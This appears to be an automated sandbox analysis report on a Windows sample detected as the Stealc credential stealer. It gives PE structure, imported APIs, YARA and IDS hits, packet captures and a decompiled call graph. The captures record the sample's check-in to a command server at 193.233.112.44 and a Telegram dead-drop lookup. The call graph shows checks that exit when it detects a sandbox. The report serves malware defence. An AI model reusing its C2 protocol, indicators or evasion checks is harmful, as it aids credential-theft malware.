                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x1e0000x104.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x1cc8f0x1ce00772877cbef91323cce1e5e6fd7751dfbFalse0.468259604978355Matlab v4 mat-file (little endian) \352\316A, numeric, rows 4316256, columns 06.091301719361258IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rdata0x1e0000xcfec0xd000b2323904f62b167dba799c7c680521a5False0.5270244891826923data6.652181615943377IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x2b0000x2303a40x1e40047130f1bd451e62a6f3377958ec20b2funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .reloc0x25c0000x459e0x46008ab3c7ccd47f8b4178413c498003e08eFalse0.4401227678571429data4.493567457805053IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x2610000x292a0x2a005f69202e3e076ee40a63c6506aad42d5False0.34337797619047616data4.70793889785315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x2611a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0, 16 important colors0.6216216216216216
                                                          RT_ICON0x2612c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0, 256 important colors0.5794797687861272
                                                          RT_ICON0x2618300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0, 16 important colors0.5080645161290323
                                                          RT_ICON0x261b180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0, 256 important colors0.5446750902527075
                                                          RT_ICON0x2623c00x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.3621951219512195
                                                          RT_ICON0x262a280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.4224413646055437
                                                          RT_GROUP_ICON0x2638d00x5adata0.7333333333333333
                                                          DLLImport
                                                          msvcrt.dllstrncpy, ??_V@YAXPAX@Z, memchr, ??_U@YAPAXI@Z, strtok, atexit, strtok_s, strcpy_s, vsprintf_s, memmove, strlen, malloc, free, memcmp, ??2@YAPAXI@Z, memset, memcpy, __CxxFrameHandler3
                                                          KERNEL32.dllGetCurrentProcess, RaiseException, GetStringTypeW, MultiByteToWideChar, LCMapStringW, IsValidCodePage, GetOEMCP, lstrlenA, HeapAlloc, GetProcessHeap, VirtualProtect, WaitForSingleObject, CreateProcessA, lstrcatA, VirtualQueryEx, OpenProcess, ReadProcessMemory, WriteFile, GetACP, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, TerminateProcess, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, EnterCriticalSection, RtlUnwind, GetProcAddress, GetModuleHandleW, ExitProcess, Sleep, GetStdHandle, GetModuleFileNameW, GetLastError, LoadLibraryW, TlsGetValue, TlsSetValue, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, WideCharToMultiByte
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-10-04T00:57:00.721287+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649716193.233.112.4480TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 4, 2024 00:56:56.250982046 CEST49714443192.168.2.6149.154.167.99
                                                          Oct 4, 2024 00:56:56.251017094 CEST44349714149.154.167.99192.168.2.6
                                                          Oct 4, 2024 00:56:56.251127958 CEST49714443192.168.2.6149.154.167.99
                                                          Oct 4, 2024 00:56:56.264940977 CEST49714443192.168.2.6149.154.167.99
                                                          Oct 4, 2024 00:56:56.264956951 CEST44349714149.154.167.99192.168.2.6
                                                          Oct 4, 2024 00:56:56.906230927 CEST44349714149.154.167.99192.168.2.6
                                                          Oct 4, 2024 00:56:56.907191992 CEST49714443192.168.2.6149.154.167.99
                                                          Oct 4, 2024 00:56:57.535132885 CEST49714443192.168.2.6149.154.167.99
                                                          Oct 4, 2024 00:56:57.535161018 CEST44349714149.154.167.99192.168.2.6
                                                          Oct 4, 2024 00:56:57.535439968 CEST44349714149.154.167.99192.168.2.6
                                                          Oct 4, 2024 00:56:57.535501003 CEST49714443192.168.2.6149.154.167.99
                                                          Oct 4, 2024 00:56:57.539289951 CEST49714443192.168.2.6149.154.167.99
                                                          Oct 4, 2024 00:56:57.579402924 CEST44349714149.154.167.99192.168.2.6
                                                          Oct 4, 2024 00:56:57.726885080 CEST44349714149.154.167.99192.168.2.6
                                                          Oct 4, 2024 00:56:57.726902008 CEST44349714149.154.167.99192.168.2.6
                                                          Oct 4, 2024 00:56:57.726941109 CEST44349714149.154.167.99192.168.2.6
                                                          Oct 4, 2024 00:56:57.726955891 CEST44349714149.154.167.99192.168.2.6
                                                          Oct 4, 2024 00:56:57.726963043 CEST49714443192.168.2.6149.154.167.99
                                                          Oct 4, 2024 00:56:57.726999044 CEST49714443192.168.2.6149.154.167.99
                                                          Oct 4, 2024 00:56:57.727049112 CEST49714443192.168.2.6149.154.167.99
                                                          Oct 4, 2024 00:56:57.736054897 CEST49714443192.168.2.6149.154.167.99
                                                          Oct 4, 2024 00:56:57.736068964 CEST44349714149.154.167.99192.168.2.6
                                                          Oct 4, 2024 00:56:57.754158020 CEST4971580192.168.2.691.214.78.145
                                                          Oct 4, 2024 00:56:57.759234905 CEST804971591.214.78.145192.168.2.6
                                                          Oct 4, 2024 00:56:57.759413958 CEST4971580192.168.2.691.214.78.145
                                                          Oct 4, 2024 00:56:57.759588003 CEST4971580192.168.2.691.214.78.145
                                                          Oct 4, 2024 00:56:57.764365911 CEST804971591.214.78.145192.168.2.6
                                                          Oct 4, 2024 00:56:59.464976072 CEST804971591.214.78.145192.168.2.6
                                                          Oct 4, 2024 00:56:59.465089083 CEST4971580192.168.2.691.214.78.145
                                                          Oct 4, 2024 00:56:59.465727091 CEST4971580192.168.2.691.214.78.145
                                                          Oct 4, 2024 00:56:59.470124006 CEST4971680192.168.2.6193.233.112.44
                                                          Oct 4, 2024 00:56:59.471800089 CEST804971591.214.78.145192.168.2.6
                                                          Oct 4, 2024 00:56:59.476260900 CEST8049716193.233.112.44192.168.2.6
                                                          Oct 4, 2024 00:56:59.476358891 CEST4971680192.168.2.6193.233.112.44
                                                          Oct 4, 2024 00:56:59.476568937 CEST4971680192.168.2.6193.233.112.44
                                                          Oct 4, 2024 00:56:59.482949018 CEST8049716193.233.112.44192.168.2.6
                                                          Oct 4, 2024 00:57:00.305043936 CEST8049716193.233.112.44192.168.2.6
                                                          Oct 4, 2024 00:57:00.305114985 CEST4971680192.168.2.6193.233.112.44
                                                          Oct 4, 2024 00:57:00.328989029 CEST4971680192.168.2.6193.233.112.44
                                                          Oct 4, 2024 00:57:00.335839987 CEST8049716193.233.112.44192.168.2.6
                                                          Oct 4, 2024 00:57:00.721211910 CEST8049716193.233.112.44192.168.2.6
                                                          Oct 4, 2024 00:57:00.721287012 CEST4971680192.168.2.6193.233.112.44
                                                          Oct 4, 2024 00:57:01.832484961 CEST4971680192.168.2.6193.233.112.44
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 4, 2024 00:56:56.237881899 CEST6070053192.168.2.61.1.1.1
                                                          Oct 4, 2024 00:56:56.246144056 CEST53607001.1.1.1192.168.2.6
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Oct 4, 2024 00:56:56.237881899 CEST192.168.2.61.1.1.10x675dStandard query (0)t.meA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Oct 4, 2024 00:56:56.246144056 CEST1.1.1.1192.168.2.60x675dNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                          • t.me
                                                          • 91.214.78.145
                                                          • 193.233.112.44
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.64971591.214.78.145806936C:\Users\user\Desktop\BnxBRWQWhy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 4, 2024 00:56:57.759588003 CEST88OUTGET / HTTP/1.1
                                                          Host: 91.214.78.145
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.649716193.233.112.44806936C:\Users\user\Desktop\BnxBRWQWhy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 4, 2024 00:56:59.476568937 CEST89OUTGET / HTTP/1.1
                                                          Host: 193.233.112.44
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 4, 2024 00:57:00.305043936 CEST170INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Thu, 03 Oct 2024 22:57:00 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 0
                                                          Connection: keep-alive
                                                          Oct 4, 2024 00:57:00.328989029 CEST412OUTPOST /383ccd496f3c5eee.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBA
                                                          Host: 193.233.112.44
                                                          Content-Length: 211
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Data Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 31 36 34 43 46 37 31 45 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 6f 66 74 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 2d 2d 0d 0a
                                                          Data Ascii: ------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="hwid"86164CF71E4C2817018708------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="build"soft------CGDGCFBAEGDHJKEBGCBA--
                                                          Oct 4, 2024 00:57:00.721211910 CEST178INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Thu, 03 Oct 2024 22:57:00 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 8
                                                          Connection: keep-alive
                                                          Data Raw: 59 6d 78 76 59 32 73 3d
                                                          Data Ascii: YmxvY2s=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.649714149.154.167.994436936C:\Users\user\Desktop\BnxBRWQWhy.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-10-03 22:56:57 UTC91OUTGET /hwlflcqshvwp HTTP/1.1
                                                          Host: t.me
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-10-03 22:56:57 UTC511INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0
                                                          Date: Thu, 03 Oct 2024 22:56:57 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 12415
                                                          Connection: close
                                                          Set-Cookie: stel_ssid=76118ed14c179f4c2c_1390940431536211434; expires=Fri, 04 Oct 2024 22:56:57 GMT; path=/; samesite=None; secure; HttpOnly
                                                          Pragma: no-cache
                                                          Cache-control: no-store
                                                          X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                          Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                          Strict-Transport-Security: max-age=35768000
                                                          2024-10-03 22:56:57 UTC12415INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 68 77 6c 66 6c 63 71 73 68 76 77 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e
                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @hwlflcqshvwp</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Target ID:0
                                                          Start time:18:56:54
                                                          Start date:03/10/2024
                                                          Path:C:\Users\user\Desktop\BnxBRWQWhy.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\BnxBRWQWhy.exe"
                                                          Imagebase:0x730000
                                                          File size:336'040 bytes
                                                          MD5 hash:EA6989E3A607D753377B05BAE55140D8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000000.2106325851.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:13%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:9.8%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:26
                                                            execution_graph 12248 7469f0 12291 732260 12248->12291 12265 747850 3 API calls 12266 746a30 12265->12266 12267 7478e0 3 API calls 12266->12267 12268 746a43 12267->12268 12424 74a9b0 12268->12424 12270 746a64 12271 74a9b0 4 API calls 12270->12271 12272 746a6b 12271->12272 12273 74a9b0 4 API calls 12272->12273 12274 746a72 12273->12274 12275 74a9b0 4 API calls 12274->12275 12276 746a79 12275->12276 12277 74a9b0 4 API calls 12276->12277 12278 746a80 12277->12278 12432 74a8a0 12278->12432 12280 746b0c 12436 746920 GetSystemTime 12280->12436 12282 746a89 12282->12280 12284 746ac2 OpenEventA 12282->12284 12286 746af5 CloseHandle Sleep 12284->12286 12287 746ad9 12284->12287 12288 746b0a 12286->12288 12290 746ae1 CreateEventA 12287->12290 12288->12282 12290->12280 12633 7345c0 17 API calls 12291->12633 12293 732274 12294 7345c0 34 API calls 12293->12294 12295 73228d 12294->12295 12296 7345c0 34 API calls 12295->12296 12297 7322a6 12296->12297 12298 7345c0 34 API calls 12297->12298 12299 7322bf 12298->12299 12300 7345c0 34 API calls 12299->12300 12301 7322d8 12300->12301 12302 7345c0 34 API calls 12301->12302 12303 7322f1 12302->12303 12304 7345c0 34 API calls 12303->12304 12305 73230a 12304->12305 12306 7345c0 34 API calls 12305->12306 12307 732323 12306->12307 12308 7345c0 34 API calls 12307->12308 12309 73233c 12308->12309 12310 7345c0 34 API calls 12309->12310 12311 732355 12310->12311 12312 7345c0 34 API calls 12311->12312 12313 73236e 12312->12313 12314 7345c0 34 API calls 12313->12314 12315 732387 12314->12315 12316 7345c0 34 API calls 12315->12316 12317 7323a0 12316->12317 12318 7345c0 34 API calls 12317->12318 12319 7323b9 12318->12319 12320 7345c0 34 API calls 12319->12320 12321 7323d2 12320->12321 12322 7345c0 34 API calls 12321->12322 12323 7323eb 12322->12323 12324 7345c0 34 API calls 12323->12324 12325 732404 12324->12325 12326 7345c0 34 API calls 12325->12326 12327 73241d 12326->12327 12328 7345c0 34 API calls 12327->12328 12329 732436 12328->12329 12330 7345c0 34 API calls 12329->12330 12331 73244f 12330->12331 12332 7345c0 34 API calls 12331->12332 12333 732468 12332->12333 12334 7345c0 34 API calls 12333->12334 12335 732481 12334->12335 12336 7345c0 34 API calls 12335->12336 12337 73249a 12336->12337 12338 7345c0 34 API calls 12337->12338 12339 7324b3 12338->12339 12340 7345c0 34 API calls 12339->12340 12341 7324cc 12340->12341 12342 7345c0 34 API calls 12341->12342 12343 7324e5 12342->12343 12344 7345c0 34 API calls 12343->12344 12345 7324fe 12344->12345 12346 7345c0 34 API calls 12345->12346 12347 732517 12346->12347 12348 7345c0 34 API calls 12347->12348 12349 732530 12348->12349 12350 7345c0 34 API calls 12349->12350 12351 732549 12350->12351 12352 7345c0 34 API calls 12351->12352 12353 732562 12352->12353 12354 7345c0 34 API calls 12353->12354 12355 73257b 12354->12355 12356 7345c0 34 API calls 12355->12356 12357 732594 12356->12357 12358 7345c0 34 API calls 12357->12358 12359 7325ad 12358->12359 12360 7345c0 34 API calls 12359->12360 12361 7325c6 12360->12361 12362 7345c0 34 API calls 12361->12362 12363 7325df 12362->12363 12364 7345c0 34 API calls 12363->12364 12365 7325f8 12364->12365 12366 7345c0 34 API calls 12365->12366 12367 732611 12366->12367 12368 7345c0 34 API calls 12367->12368 12369 73262a 12368->12369 12370 7345c0 34 API calls 12369->12370 12371 732643 12370->12371 12372 7345c0 34 API calls 12371->12372 12373 73265c 12372->12373 12374 7345c0 34 API calls 12373->12374 12375 732675 12374->12375 12376 7345c0 34 API calls 12375->12376 12377 73268e 12376->12377 12378 749860 12377->12378 12637 749750 GetPEB 12378->12637 12380 749868 12381 749a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 12380->12381 12382 74987a 12380->12382 12383 749af4 GetProcAddress 12381->12383 12384 749b0d 12381->12384 12385 74988c 21 API calls 12382->12385 12383->12384 12386 749b46 12384->12386 12387 749b16 GetProcAddress GetProcAddress 12384->12387 12385->12381 12388 749b4f GetProcAddress 12386->12388 12389 749b68 12386->12389 12387->12386 12388->12389 12390 749b71 GetProcAddress 12389->12390 12391 749b89 12389->12391 12390->12391 12392 746a00 12391->12392 12393 749b92 GetProcAddress GetProcAddress 12391->12393 12394 74a740 12392->12394 12393->12392 12396 74a750 12394->12396 12395 746a0d 12398 7311d0 12395->12398 12396->12395 12397 74a77e lstrcpy 12396->12397 12397->12395 12399 7311e8 12398->12399 12400 731217 12399->12400 12401 73120f ExitProcess 12399->12401 12402 731160 GetSystemInfo 12400->12402 12403 731184 12402->12403 12404 73117c ExitProcess 12402->12404 12405 731110 GetCurrentProcess VirtualAllocExNuma 12403->12405 12406 731141 ExitProcess 12405->12406 12407 731149 12405->12407 12638 7310a0 VirtualAlloc 12407->12638 12410 731220 12642 7489b0 12410->12642 12413 731249 __aulldiv 12414 73129a 12413->12414 12415 731292 ExitProcess 12413->12415 12416 746770 GetUserDefaultLangID 12414->12416 12417 746792 12416->12417 12418 7467d3 GetUserDefaultLCID 12416->12418 12417->12418 12419 7467b7 ExitProcess 12417->12419 12420 7467c1 ExitProcess 12417->12420 12421 7467a3 ExitProcess 12417->12421 12422 7467ad ExitProcess 12417->12422 12423 7467cb ExitProcess 12417->12423 12418->12265 12644 74a710 12424->12644 12426 74a9c1 lstrlenA 12428 74a9e0 12426->12428 12427 74aa18 12645 74a7a0 12427->12645 12428->12427 12430 74a9fa lstrcpy lstrcatA 12428->12430 12430->12427 12431 74aa24 12431->12270 12433 74a8bb 12432->12433 12434 74a90b 12433->12434 12435 74a8f9 lstrcpy 12433->12435 12434->12282 12435->12434 12649 746820 12436->12649 12438 74698e 12439 746998 sscanf 12438->12439 12678 74a800 12439->12678 12441 7469aa SystemTimeToFileTime SystemTimeToFileTime 12442 7469e0 12441->12442 12443 7469ce 12441->12443 12445 745b10 12442->12445 12443->12442 12444 7469d8 ExitProcess 12443->12444 12446 745b1d 12445->12446 12447 74a740 lstrcpy 12446->12447 12448 745b2e 12447->12448 12680 74a820 lstrlenA 12448->12680 12451 74a820 2 API calls 12452 745b64 12451->12452 12453 74a820 2 API calls 12452->12453 12454 745b74 12453->12454 12684 746430 12454->12684 12457 74a820 2 API calls 12458 745b93 12457->12458 12459 74a820 2 API calls 12458->12459 12460 745ba0 12459->12460 12461 74a820 2 API calls 12460->12461 12462 745bad 12461->12462 12463 74a820 2 API calls 12462->12463 12464 745bf9 12463->12464 12693 7326a0 12464->12693 12472 745cc3 12473 746430 lstrcpy 12472->12473 12474 745cd5 12473->12474 12475 74a7a0 lstrcpy 12474->12475 12476 745cf2 12475->12476 12477 74a9b0 4 API calls 12476->12477 12478 745d0a 12477->12478 12479 74a8a0 lstrcpy 12478->12479 12480 745d16 12479->12480 12481 74a9b0 4 API calls 12480->12481 12482 745d3a 12481->12482 12483 74a8a0 lstrcpy 12482->12483 12484 745d46 12483->12484 12485 74a9b0 4 API calls 12484->12485 12486 745d6a 12485->12486 12487 74a8a0 lstrcpy 12486->12487 12488 745d76 12487->12488 12489 74a740 lstrcpy 12488->12489 12490 745d9e 12489->12490 13419 747500 GetWindowsDirectoryA 12490->13419 12493 74a7a0 lstrcpy 12494 745db8 12493->12494 13429 734880 12494->13429 12496 745dbe 13575 7417a0 12496->13575 12498 745dc6 12499 74a740 lstrcpy 12498->12499 12500 745de9 12499->12500 12501 731590 lstrcpy 12500->12501 12502 745dfd 12501->12502 13595 735960 12502->13595 12504 745e03 13741 741050 12504->13741 12506 745e0e 12507 74a740 lstrcpy 12506->12507 12508 745e32 12507->12508 12509 731590 lstrcpy 12508->12509 12510 745e46 12509->12510 12511 735960 39 API calls 12510->12511 12512 745e4c 12511->12512 13748 740d90 12512->13748 12514 745e57 12515 74a740 lstrcpy 12514->12515 12516 745e79 12515->12516 12517 731590 lstrcpy 12516->12517 12518 745e8d 12517->12518 12519 735960 39 API calls 12518->12519 12520 745e93 12519->12520 13758 740f40 12520->13758 12522 745e9e 12523 731590 lstrcpy 12522->12523 12524 745eb5 12523->12524 13766 741a10 12524->13766 12526 745eba 12527 74a740 lstrcpy 12526->12527 12528 745ed6 12527->12528 14110 734fb0 GetProcessHeap HeapAlloc InternetOpenA 12528->14110 12530 745edb 12531 731590 lstrcpy 12530->12531 12532 745f5b 12531->12532 14118 740740 12532->14118 12534 745f60 12535 74a740 lstrcpy 12534->12535 12536 745f86 12535->12536 12634 734697 12633->12634 12635 73474f 6 API calls 12634->12635 12636 7346ac 11 API calls 12634->12636 12635->12293 12636->12634 12637->12380 12640 7310c2 ctype 12638->12640 12639 7310fd 12639->12410 12640->12639 12641 7310e2 VirtualFree 12640->12641 12641->12639 12643 731233 GlobalMemoryStatusEx 12642->12643 12643->12413 12644->12426 12646 74a7c2 12645->12646 12647 74a7ec 12646->12647 12648 74a7da lstrcpy 12646->12648 12647->12431 12648->12647 12650 74a740 lstrcpy 12649->12650 12651 746833 12650->12651 12652 74a9b0 4 API calls 12651->12652 12653 746845 12652->12653 12654 74a8a0 lstrcpy 12653->12654 12655 74684e 12654->12655 12656 74a9b0 4 API calls 12655->12656 12657 746867 12656->12657 12658 74a8a0 lstrcpy 12657->12658 12659 746870 12658->12659 12660 74a9b0 4 API calls 12659->12660 12661 74688a 12660->12661 12662 74a8a0 lstrcpy 12661->12662 12663 746893 12662->12663 12664 74a9b0 4 API calls 12663->12664 12665 7468ac 12664->12665 12666 74a8a0 lstrcpy 12665->12666 12667 7468b5 12666->12667 12668 74a9b0 4 API calls 12667->12668 12669 7468cf 12668->12669 12670 74a8a0 lstrcpy 12669->12670 12671 7468d8 12670->12671 12672 74a9b0 4 API calls 12671->12672 12673 7468f3 12672->12673 12674 74a8a0 lstrcpy 12673->12674 12675 7468fc 12674->12675 12676 74a7a0 lstrcpy 12675->12676 12677 746910 12676->12677 12677->12438 12679 74a812 12678->12679 12679->12441 12681 74a83f 12680->12681 12682 745b54 12681->12682 12683 74a87b lstrcpy 12681->12683 12682->12451 12683->12682 12685 74a8a0 lstrcpy 12684->12685 12686 746443 12685->12686 12687 74a8a0 lstrcpy 12686->12687 12688 746455 12687->12688 12689 74a8a0 lstrcpy 12688->12689 12690 746467 12689->12690 12691 74a8a0 lstrcpy 12690->12691 12692 745b86 12691->12692 12692->12457 12694 7345c0 34 API calls 12693->12694 12695 7326b4 12694->12695 12696 7345c0 34 API calls 12695->12696 12697 7326d7 12696->12697 12698 7345c0 34 API calls 12697->12698 12699 7326f0 12698->12699 12700 7345c0 34 API calls 12699->12700 12701 732709 12700->12701 12702 7345c0 34 API calls 12701->12702 12703 732736 12702->12703 12704 7345c0 34 API calls 12703->12704 12705 73274f 12704->12705 12706 7345c0 34 API calls 12705->12706 12707 732768 12706->12707 12708 7345c0 34 API calls 12707->12708 12709 732795 12708->12709 12710 7345c0 34 API calls 12709->12710 12711 7327ae 12710->12711 12712 7345c0 34 API calls 12711->12712 12713 7327c7 12712->12713 12714 7345c0 34 API calls 12713->12714 12715 7327e0 12714->12715 12716 7345c0 34 API calls 12715->12716 12717 7327f9 12716->12717 12718 7345c0 34 API calls 12717->12718 12719 732812 12718->12719 12720 7345c0 34 API calls 12719->12720 12721 73282b 12720->12721 12722 7345c0 34 API calls 12721->12722 12723 732844 12722->12723 12724 7345c0 34 API calls 12723->12724 12725 73285d 12724->12725 12726 7345c0 34 API calls 12725->12726 12727 732876 12726->12727 12728 7345c0 34 API calls 12727->12728 12729 73288f 12728->12729 12730 7345c0 34 API calls 12729->12730 12731 7328a8 12730->12731 12732 7345c0 34 API calls 12731->12732 12733 7328c1 12732->12733 12734 7345c0 34 API calls 12733->12734 12735 7328da 12734->12735 12736 7345c0 34 API calls 12735->12736 12737 7328f3 12736->12737 12738 7345c0 34 API calls 12737->12738 12739 73290c 12738->12739 12740 7345c0 34 API calls 12739->12740 12741 732925 12740->12741 12742 7345c0 34 API calls 12741->12742 12743 73293e 12742->12743 12744 7345c0 34 API calls 12743->12744 12745 732957 12744->12745 12746 7345c0 34 API calls 12745->12746 12747 732970 12746->12747 12748 7345c0 34 API calls 12747->12748 12749 732989 12748->12749 12750 7345c0 34 API calls 12749->12750 12751 7329a2 12750->12751 12752 7345c0 34 API calls 12751->12752 12753 7329bb 12752->12753 12754 7345c0 34 API calls 12753->12754 12755 7329d4 12754->12755 12756 7345c0 34 API calls 12755->12756 12757 7329ed 12756->12757 12758 7345c0 34 API calls 12757->12758 12759 732a06 12758->12759 12760 7345c0 34 API calls 12759->12760 12761 732a1f 12760->12761 12762 7345c0 34 API calls 12761->12762 12763 732a38 12762->12763 12764 7345c0 34 API calls 12763->12764 12765 732a51 12764->12765 12766 7345c0 34 API calls 12765->12766 12767 732a6a 12766->12767 12768 7345c0 34 API calls 12767->12768 12769 732a83 12768->12769 12770 7345c0 34 API calls 12769->12770 12771 732a9c 12770->12771 12772 7345c0 34 API calls 12771->12772 12773 732ab5 12772->12773 12774 7345c0 34 API calls 12773->12774 12775 732ace 12774->12775 12776 7345c0 34 API calls 12775->12776 12777 732ae7 12776->12777 12778 7345c0 34 API calls 12777->12778 12779 732b00 12778->12779 12780 7345c0 34 API calls 12779->12780 12781 732b19 12780->12781 12782 7345c0 34 API calls 12781->12782 12783 732b32 12782->12783 12784 7345c0 34 API calls 12783->12784 12785 732b4b 12784->12785 12786 7345c0 34 API calls 12785->12786 12787 732b64 12786->12787 12788 7345c0 34 API calls 12787->12788 12789 732b7d 12788->12789 12790 7345c0 34 API calls 12789->12790 12791 732b96 12790->12791 12792 7345c0 34 API calls 12791->12792 12793 732baf 12792->12793 12794 7345c0 34 API calls 12793->12794 12795 732bc8 12794->12795 12796 7345c0 34 API calls 12795->12796 12797 732be1 12796->12797 12798 7345c0 34 API calls 12797->12798 12799 732bfa 12798->12799 12800 7345c0 34 API calls 12799->12800 12801 732c13 12800->12801 12802 7345c0 34 API calls 12801->12802 12803 732c2c 12802->12803 12804 7345c0 34 API calls 12803->12804 12805 732c45 12804->12805 12806 7345c0 34 API calls 12805->12806 12807 732c5e 12806->12807 12808 7345c0 34 API calls 12807->12808 12809 732c77 12808->12809 12810 7345c0 34 API calls 12809->12810 12811 732c90 12810->12811 12812 7345c0 34 API calls 12811->12812 